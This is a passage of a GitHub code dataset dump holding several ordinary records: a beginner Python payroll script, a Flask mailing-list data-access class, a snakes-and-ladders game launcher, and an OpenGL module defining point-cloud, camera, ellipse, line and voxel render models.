\"payroll.txt\"\r\n    outfile = open(file2, 'w')    \r\n    with open(file, 'r') as f:\r\n        for line in f:\r\n            first = line.split()\r\n            uname = (first[1])\r\n            uname2 = (first[0])\r\n            print()\r\n            wage = (first[2])\r\n            wage = eval(wage)\r\n            hour = (first[3])\r\n            hour = eval(hour)\r\n            sal = hour * wage\r\n            payrol = payroll(sal)\r\n            print(uname,\"\",uname2,\"$\",sal, file = outfile)\r\n            \r\n            \r\n            \r\n    print (\"The payroll for the week is $\",payrol,file = outfile)\r\n    \r\nmain()    \r\n","repo_name":"gordonedjhill/Introduction-to-the-great-language-python1","sub_path":"wagetxt.py","file_name":"wagetxt.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74995491073","text":"\nimport datetime\nfrom api import db\nfrom api.models import Mailinglist, BaseDAO\n\n\nclass MailingListDAO(BaseDAO):\n    \"\"\"\n    operations against the MailingList table\n    \"\"\"\n    table = Mailinglist\n\n    @classmethod\n    def create(cls, name, email, message):\n        subscriber = cls.table.create_new(name=name, email=email, message=message, subscribed=True)\n        db.session.add(subscriber)\n        db.session.commit()\n        return subscriber\n\n    @classmethod\n    
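# fetch a single subscriber row by its primary key\n    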
def get(cls, mailinglist_id):\n return Mailinglist.query.get(mailinglist_id)\n\n @classmethod\n def get_by_email(cls, email):\n return cls.table.query.filter(cls.table.email == email).all()\n\n @classmethod\n def list(cls, num_days=None):\n if num_days is None:\n return [subscriber.to_dict() for subscriber in cls.table.query.all()]\n else:\n start_date = datetime.datetime.utcnow() - datetime.timedelta(days=num_days)\n return [subscriber.to_dict() for subscriber in cls.table.query.filter(cls.table.created > start_date).all()]\n\n @classmethod\n def subscribe(cls, name, email, message):\n \"\"\" Create a new subscriber if one doesn't exist or re-subscribe an email if it already exists. \"\"\"\n subscriber = cls.table.query.filter(cls.table.email == email).first()\n if subscriber is None:\n return cls.create(name, email, message)\n else:\n subscriber.subscribed = True\n db.session.commit()\n return subscriber\n\n @classmethod\n def unsubscribe(cls, email):\n \"\"\" Find any and all instances of an email in the mailing list and unsubscribe it. \"\"\"\n emails = cls.table.query.filter(cls.table.email == email).all()\n for email in emails:\n email.subscribed = False\n db.session.commit()\n","repo_name":"Everyday-Future/cookiecutter-devops","sub_path":"{{cookiecutter.project_slug}}/api/daos/mailinglist.py","file_name":"mailinglist.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"70986671555","text":"from src.services.game import Game\n\ngame = Game()\n\nnum_of_players = 2\nfor i in range(num_of_players):\n name = input(\"Enter player's name:\")\n game.add_player(name)\n\ngame.add_board(100)\ngame.add_dice(6)\n\nsnakes_and_ladders = {\n\t(99, 10), (8, 35), (40, 22), (91, 45), (46, 83),\n\t(88, 32), (66, 94), (54, 86), (44, 3), (74, 62),\n\t(1, 9), (8, 4), (2, 11), (12, 3)\t\n}\nfor item in snakes_and_ladders:\n\tgame.add_side_effect(*item)\ngame.play()\n","repo_name":"anuj-kumar/snakeladder","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"36003488770","text":"from abc import abstractmethod\n\nimport dataclasses\nfrom OpenGL.GL import *\nfrom dataclasses import dataclass, field\n\nfrom viz3d.opengl.gl_algebra import *\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# Model Data\n@dataclass\nclass ModelData:\n \"\"\"An abstract class for ModelData which reunite all variables needed to define a specific model\"\"\"\n default_color: Optional[np.ndarray] = None # The default color of the model\n instance_model_to_world: Optional[np.ndarray] = None # The Optional transformation matrix from instance to world\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# Model\nclass Model:\n \"\"\"\n A Model contains all the information to be drawn by the engine\n The Geometric Data (Mesh, Points, Lines),\n And the textures\n \"\"\"\n\n def __init__(self, model_data: Optional[ModelData] = None):\n self.model_data = model_data\n self.vao = None\n self.instance_pose_bo = None\n\n self._last_num_instances = 0\n\n # ------------------------------------------------------------------------------------------------------------------\n @property\n def model_data(self):\n \"\"\"Returns the model data saved for this 
model\"\"\"\n return self._model_data\n\n @model_data.setter\n def model_data(self, _model_data: Optional[ModelData]):\n valid_model_data = self.verify_model_data(_model_data)\n if valid_model_data is not None:\n if valid_model_data.instance_model_to_world is None:\n valid_model_data.instance_model_to_world = np.eye(4, dtype=np.float32).reshape(1, 4, 4)\n check_sizes(valid_model_data.instance_model_to_world, [-1, 4, 4])\n self._model_data = valid_model_data\n\n def num_instances(self):\n \"\"\"\n Returns the number of instances of the current model\n\n More precisely, returns the number of instances corresponding to the last\n Model Data sent to the device via `update_model`\n \"\"\"\n return self._last_num_instances\n\n # ------------------------------------------------------------------------------------------------------------------\n @abstractmethod\n def init_buffers(self):\n \"\"\"\n Initializes\n \"\"\"\n self.vao = glGenVertexArrays(1)\n self.instance_pose_bo = glGenBuffers(1)\n\n @abstractmethod\n def verify_model_data(self, model_data: Optional[ModelData]):\n \"\"\"\n Verifies that `model_data` is valid for this instance,\n or that a valid ModelData can be built from it\n\n Returns a valid ModelData\n \"\"\"\n assert_debug(model_data is not None)\n return model_data\n\n @abstractmethod\n def init_model(self):\n \"\"\"\n Allocates buffers (VBO, EBO, and VAO) on the GPU,\n And defines the layout of the Data (with VAO's vertex attributes)\n \"\"\"\n # Draw specific Data\n raise NotImplementedError(\"\")\n\n @abstractmethod\n def update_model(self):\n \"\"\"\n Updates the model buffers when its state has changed\n \"\"\"\n # Bind the VAO for the data of the model\n glBindVertexArray(self.vao)\n\n # Send instance object poses to the GPU\n glBindBuffer(GL_ARRAY_BUFFER, self.instance_pose_bo)\n glBufferData(GL_ARRAY_BUFFER, self.model_data.instance_model_to_world.nbytes,\n\n # Need to transpose the array to build the matrix4d consistent with OpenGL layout\n self.model_data.instance_model_to_world.transpose((0, 2, 1)),\n GL_STATIC_DRAW)\n\n # Set the location of\n float_size = type_size(np.float32)\n vec4_size = 4 * float_size\n for i in range(4):\n location = self.instance_pose_location() + i\n glEnableVertexAttribArray(location)\n glVertexAttribPointer(location,\n 4,\n GL_FLOAT,\n GL_FALSE,\n vec4_size * 4,\n ctypes.c_void_p(vec4_size * i))\n glVertexAttribDivisor(location, 1)\n\n glBindVertexArray(0)\n glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, 0)\n glBindBuffer(GL_ARRAY_BUFFER, 0)\n\n # Sets the following variables corresponding to the last updated pointcloud\n self._last_num_instances = self.model_data.instance_model_to_world.shape[0]\n\n # ------------------------------------------------------------------------------------------------------------------\n @staticmethod\n def points_location():\n return 0\n\n @staticmethod\n def color_location():\n return 1\n\n @staticmethod\n def instance_pose_location():\n return 3\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# PointCloudModel\n@dataclass\nclass PointCloudModelData(ModelData):\n \"\"\"PointCloudModelData\"\"\"\n xyz: np.ndarray = field(default=np.zeros((1, 3), dtype=np.float32)) # The xyz pointcloud coordinates\n color: Optional[np.ndarray] = None # The color of the pointcloud\n point_size: float = 1.0 # The size of points for rendering\n\n\nclass PointCloudModel(Model):\n \"\"\"A Model To render simple colored PointClouds\"\"\"\n\n def __init__(self,\n 
model_data: PointCloudModelData,\n storage_mode: str = \"dynamic\"):\n super().__init__(model_data)\n\n self._is_initialized = False\n\n # --------------\n # OpenGL buffers\n check_sizes(self.model_data.instance_model_to_world, [-1, 4, 4])\n self.vertex_bo = None\n self.color_bo = None\n self.instance_pose_bo = None\n\n assert_debug(storage_mode in [\"dynamic\", \"static\"])\n if storage_mode == \"dynamic\":\n self._storage_mode = GL_DYNAMIC_DRAW\n else:\n self._storage_mode = GL_STATIC_DRAW\n\n # ---------------------------------------------------------\n # Variables of points and instances saved in OpenGL buffers\n self._last_num_points = 0\n\n def num_points(self):\n return self._last_num_points\n\n def init_model(self):\n self._is_initialized = True\n self.init_buffers()\n self.update_model()\n\n def init_buffers(self):\n super().init_buffers()\n self.vertex_bo = glGenBuffers(1)\n\n def update_model(self):\n super().update_model()\n glBindVertexArray(self.vao)\n glBindBuffer(GL_ARRAY_BUFFER, self.vertex_bo)\n\n data = np.concatenate([self.model_data.xyz, self.model_data.color], axis=1).astype(np.float32)\n glBufferData(GL_ARRAY_BUFFER, data.nbytes, data, self._storage_mode)\n\n glVertexAttribPointer(self.points_location(),\n 3,\n GL_FLOAT,\n GL_FALSE,\n 6 * type_size(np.float32),\n ctypes.c_void_p(0))\n glEnableVertexAttribArray(self.points_location())\n\n glVertexAttribPointer(self.color_location(),\n 3,\n GL_FLOAT,\n GL_FALSE,\n 6 * type_size(np.float32),\n ctypes.c_void_p(3 * type_size(np.float32)))\n glEnableVertexAttribArray(self.color_location())\n self._last_num_points = self.model_data.xyz.shape[0]\n\n def delete(self):\n glDeleteVertexArrays(1, int(self.vao))\n glDeleteBuffers(1, int(self.vertex_bo))\n glDeleteBuffers(1, int(self.instance_pose_bo))\n\n # ------------------------------------------------------------------------------------------------------------------\n def verify_model_data(self, _model_data: Optional[ModelData]):\n \"\"\"Safe setter which verifies that the Point Cloud data is correct\"\"\"\n assert_debug(_model_data is not None)\n check_sizes(_model_data.xyz, [-1, 3])\n if _model_data.xyz.dtype != np.float32:\n _model_data = dataclasses.replace(_model_data, xyz=_model_data.xyz.astype(np.float32))\n\n if _model_data.color is None:\n default_color = _model_data.default_color\n if default_color is None:\n default_color = farray([[0.0, 0.63, 1.0]])\n\n color = default_color.repeat(_model_data.xyz.shape[0], axis=0)\n _model_data = dataclasses.replace(_model_data, color=color)\n\n check_sizes(_model_data.color, [_model_data.xyz.shape[0], 3])\n return _model_data\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# CAMERASMODEL\n\n@dataclass\nclass CamerasModelData(ModelData):\n \"\"\"CamerasModelData\"\"\"\n camera_size: float = 1.0 # The scale factor of the camera model\n width: float = 2 # Width of the line defining the camera model\n\n\n# ----------------------------------------------------------------------------------------------------------------------\nclass CamerasModel(Model):\n \"\"\"A Model to render a set of cameras displayed as a simple edge pyramid\"\"\"\n\n __vertex_data = farray([\n 0.0, 0.0, -2.0,\n 1.0, 0.6, 0.0,\n 1.0, -0.6, 0.0,\n -1.0, -0.6, 0.0,\n -1.0, 0.6, 0.0,\n ]).reshape(-1, 3)\n\n __edge_indices = idarray([\n 0, 1,\n 0, 2,\n 0, 3,\n 0, 4,\n 1, 2,\n 2, 3,\n 3, 4,\n 4, 1\n ])\n\n def __init__(self,\n model_data: CamerasModelData,\n storage_mode: str = 
\"dynamic\"):\n super().__init__(model_data)\n\n self._is_initialized = False\n\n # --------------\n # OpenGL buffers\n self.vertex_bo = None\n self.vertex_ebo = None\n self.color_bo = None\n\n assert_debug(storage_mode in [\"dynamic\", \"static\"])\n if storage_mode == \"dynamic\":\n self._storage_mode = GL_DYNAMIC_DRAW\n else:\n self._storage_mode = GL_STATIC_DRAW\n\n def num_elements(self):\n return self.__edge_indices.shape[0]\n\n def init_model(self):\n self._is_initialized = True\n self.init_buffers()\n self.update_model()\n\n def init_buffers(self):\n super().init_buffers()\n self.vertex_bo = glGenBuffers(1)\n self.vertex_ebo = glGenBuffers(1)\n\n def update_model(self):\n super().update_model()\n glBindVertexArray(self.vao)\n\n # Populate the Vertex Buffer Object with vertex data\n glBindBuffer(GL_ARRAY_BUFFER, self.vertex_bo)\n data = np.concatenate([self.model_data.camera_size * self.__vertex_data,\n self.model_data.default_color.repeat(self.__vertex_data.shape[0], axis=0)],\n axis=1).astype(np.float32)\n glBufferData(GL_ARRAY_BUFFER, data.nbytes, data, self._storage_mode)\n\n # Define the point attribute in the defined buffer\n glVertexAttribPointer(self.points_location(),\n 3,\n GL_FLOAT,\n GL_FALSE,\n 6 * type_size(np.float32),\n ctypes.c_void_p(0))\n glEnableVertexAttribArray(self.points_location())\n\n # Define the color attribute in the defined buffer\n glVertexAttribPointer(self.color_location(),\n 3,\n GL_FLOAT,\n GL_FALSE,\n 6 * type_size(np.float32),\n ctypes.c_void_p(3 * type_size(np.float32)))\n glEnableVertexAttribArray(self.color_location())\n\n # Populate the Element Buffer Object with the edge indices\n glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, self.vertex_ebo)\n glBufferData(GL_ELEMENT_ARRAY_BUFFER, self.__edge_indices.nbytes, self.__edge_indices, GL_STATIC_DRAW)\n\n def delete(self):\n glDeleteBuffers(1, self.vertex_bo)\n glDeleteVertexArrays(1, self.vao)\n\n # ------------------------------------------------------------------------------------------------------------------\n def verify_model_data(self, _model_data: Optional[ModelData]):\n \"\"\"Safe setter which verifies that the Point Cloud data is correct\"\"\"\n assert_debug(_model_data is not None and isinstance(_model_data, CamerasModelData))\n if _model_data.default_color is None:\n _model_data = dataclasses.replace(_model_data, default_color=np.zeros((1, 3), dtype=np.float32))\n return _model_data\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n@dataclass\nclass PosesModelData(ModelData):\n \"\"\"PosesModelData\"\"\"\n scale: float = 1.0 # The scale factor of the camera model\n width: float = 2 # Width of the line defining the camera model\n\n\nclass PosesModel(Model):\n \"\"\"A Model to render of camera poses (using the robotics convention)\"\"\"\n\n __vertex_data = farray([\n 0.0, 0.0, 0.0, 1.0, 0.0, 0.0,\n 1., 0.0, 0.0, 1.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 1.0, 0.0,\n 0., 1.0, 0.0, 0.0, 1.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.6, 1.0,\n 0., 0.0, 1.0, 0.0, 0.6, 1.0\n ]).reshape(-1, 6)\n\n __edge_indices = idarray([\n 0, 1,\n 2, 3,\n 4, 5\n ])\n\n def __init__(self,\n model_data: PosesModelData,\n storage_mode: str = \"dynamic\"):\n super().__init__(model_data)\n\n self._is_initialized = False\n\n # --------------\n # OpenGL buffers\n self.vertex_bo = None\n self.vertex_ebo = None\n self.color_bo = None\n\n assert_debug(storage_mode in [\"dynamic\", \"static\"])\n if storage_mode == \"dynamic\":\n self._storage_mode = GL_DYNAMIC_DRAW\n 
else:\n self._storage_mode = GL_STATIC_DRAW\n\n def num_elements(self):\n return self.__edge_indices.shape[0]\n\n def init_model(self):\n self._is_initialized = True\n self.init_buffers()\n self.update_model()\n\n def init_buffers(self):\n super().init_buffers()\n self.vertex_bo = glGenBuffers(1)\n self.vertex_ebo = glGenBuffers(1)\n\n def update_model(self):\n super().update_model()\n glBindVertexArray(self.vao)\n\n # Populate the Vertex Buffer Object with vertex data\n glBindBuffer(GL_ARRAY_BUFFER, self.vertex_bo)\n data = np.copy(self.__vertex_data).astype(np.float32)\n data[:, :3] *= self.model_data.scale\n glBufferData(GL_ARRAY_BUFFER, data.nbytes, data, self._storage_mode)\n\n # Define the point attribute in the defined buffer\n glVertexAttribPointer(self.points_location(),\n 3,\n GL_FLOAT,\n GL_FALSE,\n 6 * type_size(np.float32),\n ctypes.c_void_p(0))\n glEnableVertexAttribArray(self.points_location())\n\n # Define the color attribute in the defined buffer\n glVertexAttribPointer(self.color_location(),\n 3,\n GL_FLOAT,\n GL_FALSE,\n 6 * type_size(np.float32),\n ctypes.c_void_p(3 * type_size(np.float32)))\n glEnableVertexAttribArray(self.color_location())\n\n # Populate the Element Buffer Object with the edge indices\n glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, self.vertex_ebo)\n glBufferData(GL_ELEMENT_ARRAY_BUFFER, self.__edge_indices.nbytes, self.__edge_indices, GL_STATIC_DRAW)\n\n def delete(self):\n glDeleteBuffers(1, self.vertex_bo)\n glDeleteVertexArrays(1, self.vao)\n\n # ------------------------------------------------------------------------------------------------------------------\n def verify_model_data(self, _model_data: Optional[ModelData]):\n \"\"\"Safe setter which verifies that the Point Cloud data is correct\"\"\"\n assert_debug(_model_data is not None and isinstance(_model_data, PosesModelData))\n if _model_data.default_color is None:\n _model_data = dataclasses.replace(_model_data, default_color=np.zeros((1, 3), dtype=np.float32))\n return _model_data\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# ScreenModel\nclass ScreenModel(Model):\n \"\"\"A Simple Screen model which allows to display texture a screen\"\"\"\n\n def __init__(self):\n super().__init__()\n\n self._is_initialized = False\n\n # --------------\n # OpenGL buffers\n self.vao = None\n self.vertex_bo = None\n\n def init_model(self):\n self._is_initialized = True\n self._initialize_buffers()\n\n @staticmethod\n def num_points():\n return 6\n\n def _initialize_buffers(self):\n self.vao = glGenVertexArrays(1)\n self.vertex_bo = glGenBuffers(1)\n\n glBindVertexArray(self.vao)\n glBindBuffer(GL_ARRAY_BUFFER, self.vertex_bo)\n\n data = np.array([\n # First screen triangle\n -1.0, 1.0, 0.0, 1.0,\n -1.0, -1.0, 0.0, 0.0,\n 1.0, -1.0, 1.0, 0.0,\n\n # Second screen triangle\n -1.0, 1.0, 0.0, 1.0,\n 1.0, -1.0, 1.0, 0.0,\n 1.0, 1.0, 1.0, 1.0\n ]).astype(np.float32)\n\n glBufferData(GL_ARRAY_BUFFER, data.nbytes, data, GL_STATIC_DRAW)\n\n glVertexAttribPointer(self.points_location(),\n 2,\n GL_FLOAT,\n GL_FALSE,\n 4 * type_size(np.float32),\n ctypes.c_void_p(0))\n glEnableVertexAttribArray(self.points_location())\n\n glVertexAttribPointer(self.tex_coords_location(),\n 2,\n GL_FLOAT,\n GL_FALSE,\n 4 * type_size(np.float32),\n ctypes.c_void_p(2 * type_size(np.float32)))\n glEnableVertexAttribArray(self.tex_coords_location())\n\n def update_model(self):\n pass\n\n def delete(self):\n if self.vertex_bo is not None:\n glDeleteBuffers(1, 
self.vertex_bo)\n if self.vao is not None:\n glDeleteVertexArrays(1, self.vao)\n\n def verify_model_data(self, model_data: Optional[ModelData]):\n return None\n\n # ------------------------------------------------------------------------------------------------------------------\n # OpenGL Shader variables and locations\n @staticmethod\n def points_location():\n return 0\n\n @staticmethod\n def tex_coords_location():\n return 1\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# ELLIPSES\n\n@dataclass\nclass EllipsesModelData(ModelData):\n \"\"\"EllipsesModelData\"\"\"\n ellipses_size: float = 1.0 # The scale factor of the camera model\n covariances: Optional[np.ndarray] = None\n means: Optional[np.ndarray] = None\n colors: Optional[np.ndarray] = None\n\n\n# ----------------------------------------------------------------------------------------------------------------------\nclass EllipsesModel(Model):\n \"\"\"A Model to render a set of low poly ellipses (80 triangles, 320 points per ellipse)\"\"\"\n\n def __init__(self,\n model_data: EllipsesModelData,\n storage_mode: str = \"dynamic\"):\n super().__init__(model_data)\n\n self._is_initialized = False\n\n # --------------\n # OpenGL buffers\n self.vertex_bo = None\n self.vertex_ebo = None\n self.color_bo = None\n\n assert_debug(storage_mode in [\"dynamic\", \"static\"])\n if storage_mode == \"dynamic\":\n self._storage_mode = GL_DYNAMIC_DRAW\n else:\n self._storage_mode = GL_STATIC_DRAW\n\n self._num_elements = 0\n\n def num_elements(self):\n return self._num_elements\n\n def init_model(self):\n self._is_initialized = True\n self.init_buffers()\n self.update_model()\n\n def init_buffers(self):\n super().init_buffers()\n self.vertex_bo = glGenBuffers(1)\n self.vertex_ebo = glGenBuffers(1)\n\n def update_model(self):\n super().update_model()\n\n # Build the ellipse model\n from viz3d.opengl.primitives.sphere import sphere_model_data\n vertex_and_normals, indices = sphere_model_data()\n\n num_ellipses = self.model_data.means.shape[0]\n num_points = vertex_and_normals.shape[0]\n num_triangles = indices.shape[0]\n\n ellipses_data = vertex_and_normals[:, :3].reshape(1, -1, 3).repeat(num_ellipses, axis=0)\n ellipses_indices = indices.reshape(1, -1, 3).repeat(num_ellipses, axis=0)\n ellipses_indices += (np.arange(num_ellipses) * num_points).reshape(num_ellipses, 1, 1)\n\n # Compute the square root of covariance matrices\n covariances = self.model_data.covariances\n u, s, vt = np.linalg.svd(covariances, hermitian=True)\n s = np.sqrt(s)\n diags = np.eye(3, dtype=np.float32).reshape(1, 3, 3).repeat(num_ellipses, axis=0)\n for i in range(3):\n diags[:, i, i] = s[:, i]\n square_root_covs = u @ diags @ vt\n ellipses_data = np.einsum(\"nij,nmj->nmi\", square_root_covs, ellipses_data)\n\n # Translate ellipse by their means\n ellipses_data += self.model_data.means.reshape(num_ellipses, 1, 3)\n ellipses_color = self.model_data.colors.reshape(num_ellipses, 1, 3).repeat(num_points, axis=1).reshape(-1, 3)\n\n vertex_data = ellipses_data.reshape(num_ellipses * num_points, 3)\n element_indices = ellipses_indices.reshape(num_ellipses * num_triangles * 3).astype(gl_index_np_dtype())\n self._num_elements = element_indices.shape[0]\n\n glBindVertexArray(self.vao)\n\n # Populate the Vertex Buffer Object with vertex data\n glBindBuffer(GL_ARRAY_BUFFER, self.vertex_bo)\n data = np.concatenate([self.model_data.ellipses_size * vertex_data,\n ellipses_color],\n axis=1).astype(np.float32)\n 
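# interleaved layout: (x, y, z, r, g, b) per vertex, six float32 values\n        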
glBufferData(GL_ARRAY_BUFFER, data.nbytes, data, self._storage_mode)\n\n # Define the point attribute in the defined buffer\n glVertexAttribPointer(self.points_location(),\n 3,\n GL_FLOAT,\n GL_FALSE,\n 6 * type_size(np.float32),\n ctypes.c_void_p(0))\n glEnableVertexAttribArray(self.points_location())\n\n # Define the color attribute in the defined buffer\n glVertexAttribPointer(self.color_location(),\n 3,\n GL_FLOAT,\n GL_FALSE,\n 6 * type_size(np.float32),\n ctypes.c_void_p(3 * type_size(np.float32)))\n glEnableVertexAttribArray(self.color_location())\n\n # Populate the Element Buffer Object with the edge indices\n glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, self.vertex_ebo)\n glBufferData(GL_ELEMENT_ARRAY_BUFFER, element_indices.nbytes, element_indices, self._storage_mode)\n\n def delete(self):\n glDeleteBuffers(1, self.vertex_bo)\n glDeleteVertexArrays(1, self.vao)\n\n # ------------------------------------------------------------------------------------------------------------------\n def verify_model_data(self, _model_data: Optional[ModelData]):\n \"\"\"Safe setter which verifies that the Point Cloud data is correct\"\"\"\n assert (_model_data is not None and isinstance(_model_data, EllipsesModelData))\n if _model_data.default_color is None:\n _model_data = dataclasses.replace(_model_data, default_color=np.array([[1.0, 0.0, 0.0]], dtype=np.float32))\n if _model_data.means is None:\n _model_data.means = np.array([[0.0, 0.0, 0.0]], dtype=np.float32)\n _model_data.covariances = np.eye(3, dtype=np.float32).reshape(1, 3, 3)\n else:\n means = _model_data.means\n check_sizes(means, [-1, 3])\n num_ellipses = means.shape[0]\n\n if _model_data.covariances is None:\n _model_data.covariances = np.eye(3, dtype=np.float32).reshape(1, 3, 3).repeat(num_ellipses, axis=0)\n else:\n covariances = _model_data.covariances\n check_sizes(covariances, [-1, 3, 3])\n diff = np.max(abs(covariances.transpose(0, 2, 1) - covariances))\n assert_debug(diff == 0.0, \"Covariance matrices must be symmetric\")\n\n if _model_data.colors is not None:\n check_sizes(_model_data.colors, [_model_data.means.shape[0], 3])\n _model_data.colors = _model_data.colors.astype(np.float32)\n else:\n _model_data.colors = _model_data.default_color.reshape(1, 3).repeat(_model_data.means.shape[0], axis=0)\n\n return _model_data\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# LINES\n@dataclass\nclass LinesModelData(ModelData):\n \"\"\"EllipsesModelData\"\"\"\n line_width: float = 1.0 # The scale factor of the camera model\n line_data: np.ndarray = None\n line_color: np.ndarray = None\n\n\n# ----------------------------------------------------------------------------------------------------------------------\nclass LinesModel(Model):\n \"\"\"A Model to render a set of colored lines\"\"\"\n\n def __init__(self,\n model_data: LinesModelData,\n storage_mode: str = \"dynamic\"):\n super().__init__(model_data)\n\n self._is_initialized = False\n\n # --------------\n # OpenGL buffers\n self.vertex_bo = None\n self.vertex_ebo = None\n self.color_bo = None\n\n assert_debug(storage_mode in [\"dynamic\", \"static\"])\n if storage_mode == \"dynamic\":\n self._storage_mode = GL_DYNAMIC_DRAW\n else:\n self._storage_mode = GL_STATIC_DRAW\n\n self._num_elements: int = 0\n\n def num_elements(self):\n return self._num_elements\n\n def init_model(self):\n self._is_initialized = True\n self.init_buffers()\n self.update_model()\n\n def init_buffers(self):\n super().init_buffers()\n 
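# one VBO for the interleaved line vertices, one EBO for their indices\n        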
self.vertex_bo = glGenBuffers(1)\n self.vertex_ebo = glGenBuffers(1)\n\n def update_model(self):\n super().update_model()\n glBindVertexArray(self.vao)\n\n # Build the line models\n assert isinstance(self.model_data, LinesModelData)\n vertex_data = self.model_data.line_data.reshape(-1, 3)\n color_data = self.model_data.line_color.reshape(-1, 1, 3).repeat(2, axis=1).reshape(-1, 3)\n indices = np.arange(vertex_data.shape[0]).astype(gl_index_np_dtype())\n self._num_elements = indices.shape[0]\n\n # Populate the Vertex Buffer Object with vertex data\n glBindBuffer(GL_ARRAY_BUFFER, self.vertex_bo)\n data = np.concatenate([vertex_data,\n color_data],\n axis=1).astype(np.float32)\n glBufferData(GL_ARRAY_BUFFER, data.nbytes, data, self._storage_mode)\n\n # Define the point attribute in the defined buffer\n glVertexAttribPointer(self.points_location(),\n 3,\n GL_FLOAT,\n GL_FALSE,\n 6 * type_size(np.float32),\n ctypes.c_void_p(0))\n glEnableVertexAttribArray(self.points_location())\n\n # Define the color attribute in the defined buffer\n glVertexAttribPointer(self.color_location(),\n 3,\n GL_FLOAT,\n GL_FALSE,\n 6 * type_size(np.float32),\n ctypes.c_void_p(3 * type_size(np.float32)))\n glEnableVertexAttribArray(self.color_location())\n\n # Populate the Element Buffer Object with the edge indices\n glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, self.vertex_ebo)\n glBufferData(GL_ELEMENT_ARRAY_BUFFER, indices.nbytes, indices, GL_STATIC_DRAW)\n\n def delete(self):\n glDeleteBuffers(1, self.vertex_bo)\n glDeleteVertexArrays(1, self.vao)\n\n # ------------------------------------------------------------------------------------------------------------------\n def verify_model_data(self, _model_data: Optional[ModelData]):\n \"\"\"Safe setter which verifies that the Point Cloud data is correct\"\"\"\n assert (_model_data is not None and isinstance(_model_data, LinesModelData))\n if _model_data.default_color is None:\n _model_data = dataclasses.replace(_model_data, default_color=np.array([[0.0, 1.0, 0.0]], dtype=np.float32))\n\n assert_debug(_model_data.line_data is not None)\n check_sizes(_model_data.line_data, [-1, 2, 3])\n\n _model_data.line_data = _model_data.line_data.astype(np.float32)\n num_lines = _model_data.line_data.shape[0]\n if _model_data.line_color is not None:\n check_sizes(_model_data.line_color, [-1, 3])\n else:\n _model_data.line_color = _model_data.default_color.reshape(1, 1, 3).repeat(num_lines, axis=0)\n\n return _model_data\n\n\n# ----------------------------------------------------------------------------------------------------------------------\n# VOXELS\n@dataclass\nclass VoxelsModelData(ModelData):\n \"\"\"VoxelsModelData\"\"\"\n voxel_points: np.ndarray = None\n voxel_size: float = 1.0\n line_width: float = 1.0\n\n\n# ----------------------------------------------------------------------------------------------------------------------\nclass VoxelsModel(Model):\n \"\"\"A Model to render a set of cameras displayed as a simple edge pyramid\"\"\"\n\n __voxel_model = 0.5 * farray([\n 1., 1., 1.,\n 1., 1., -1.,\n 1., -1., 1.,\n 1., -1., -1.,\n -1., 1., 1.,\n -1., 1., -1.,\n -1., -1., 1.,\n -1., -1., -1.,\n ])\n\n __voxel_element_indices = idarray([\n 0, 1,\n 0, 2,\n 0, 4,\n\n 3, 1,\n 3, 2,\n 3, 7,\n\n 6, 7,\n 6, 4,\n 6, 2,\n\n 5, 4,\n 5, 7,\n 5, 1\n ])\n\n def __init__(self,\n model_data: VoxelsModelData,\n storage_mode: str = \"dynamic\"):\n super().__init__(model_data)\n\n self._is_initialized = False\n\n # --------------\n # OpenGL buffers\n self.vertex_bo = None\n self.vertex_ebo = None\n 
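# handles for the VBO/EBO are created later, in init_buffers()\n        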
self.color_bo = None\n\n assert_debug(storage_mode in [\"dynamic\", \"static\"])\n if storage_mode == \"dynamic\":\n self._storage_mode = GL_DYNAMIC_DRAW\n else:\n self._storage_mode = GL_STATIC_DRAW\n\n self._num_elements: int = 0\n\n def num_elements(self):\n return self._num_elements\n\n def init_model(self):\n self._is_initialized = True\n self.init_buffers()\n self.update_model()\n\n def init_buffers(self):\n super().init_buffers()\n self.vertex_bo = glGenBuffers(1)\n self.vertex_ebo = glGenBuffers(1)\n\n def update_model(self):\n super().update_model()\n glBindVertexArray(self.vao)\n\n # Build the line models\n assert isinstance(self.model_data, VoxelsModelData)\n\n voxel_centers = (np.round(self.model_data.voxel_points / \\\n self.model_data.voxel_size)) * self.model_data.voxel_size\n\n voxel_centers = np.unique(voxel_centers, axis=0)\n num_points = voxel_centers.shape[0]\n\n voxel_vertices = self.model_data.voxel_size * self.__voxel_model.reshape(1, -1, 3).repeat(num_points, axis=0)\n num_model_points = self.__voxel_model.shape[0]\n\n voxel_edge_indices = self.__voxel_element_indices.reshape(1, -1, 2).repeat(num_points, axis=0)\n for i in range(num_points):\n voxel_edge_indices[i] += num_model_points * i\n voxel_vertices += voxel_centers.reshape(num_points, 1, 3)\n\n voxel_vertices = voxel_vertices.reshape(-1, 3)\n voxel_edge_indices = voxel_edge_indices.reshape(-1)\n color_data = self.model_data.default_color.reshape(1, 3).repeat(voxel_vertices.shape[0], axis=0)\n\n self._num_elements = voxel_edge_indices.shape[0]\n\n # Populate the Vertex Buffer Object with vertex data\n glBindBuffer(GL_ARRAY_BUFFER, self.vertex_bo)\n data = np.concatenate([voxel_vertices,\n color_data],\n axis=1).astype(np.float32)\n glBufferData(GL_ARRAY_BUFFER, data.nbytes, data, self._storage_mode)\n\n # Define the point attribute in the defined buffer\n glVertexAttribPointer(self.points_location(),\n 3,\n GL_FLOAT,\n GL_FALSE,\n 6 * type_size(np.float32),\n ctypes.c_void_p(0))\n glEnableVertexAttribArray(self.points_location())\n\n # Define the color attribute in the defined buffer\n 